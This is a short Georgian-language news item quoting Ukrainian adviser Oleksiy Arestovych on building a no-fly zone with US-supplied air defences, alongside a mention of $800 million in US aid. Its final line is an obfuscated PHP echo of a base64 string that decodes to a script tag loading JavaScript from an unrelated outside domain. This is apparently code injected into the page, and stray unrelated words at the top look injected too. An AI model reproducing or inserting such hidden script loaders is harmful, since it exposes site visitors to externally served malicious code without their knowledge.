celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩევლი ოლექსი არესტოვიჩი, აშშ-დან უკრაინისთვის დაგეგმილი შეიარაღების მიწოდების ფაქტს ეხმიანება და აღნიშნავს, რომ უკრაინა ამ იარაღით არასაფრენი ზონის მოწყობას თავადაც შეძლებს.
 
"ჩვენ თავადაც შესანიშნავად მოვაწყობთ არასაფრენ ზონას იმ იარაღით, რასაც ახლა გადმოგვცემენ, ანტისაჰაერო თავდაცვის საშუალო და შორი მოქმედების 800-მდე კომპლექსით, ჩვენ ისეთ არასაფრენ ზონას მოვაწყობთ, რომ უბრალოდ ვერავინ იფრენს, ნუ, მაქსიმუმ, ფრთიანი რაკეტები და რაკეტები, როგორიცაა ისკანდერები... უნდა გვახსოვდეს ისიც, რომ 30 რაკეტიდან, რომელიც ისროლეს, ჩვენმა ანტისაჰაერო თავდაცვამ 22 ჩამოაგდო",-თქვა მან.
 
ცნობისთვის, შეერთებული შტატების პრეზიდენტმა, ჯო ბაიდენმა განაცხადა, რომ აშშ უკრაინას თავდაცვისთვის დამატებით 800 მილიონ დოლარს გაუგზავნის. 
899
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");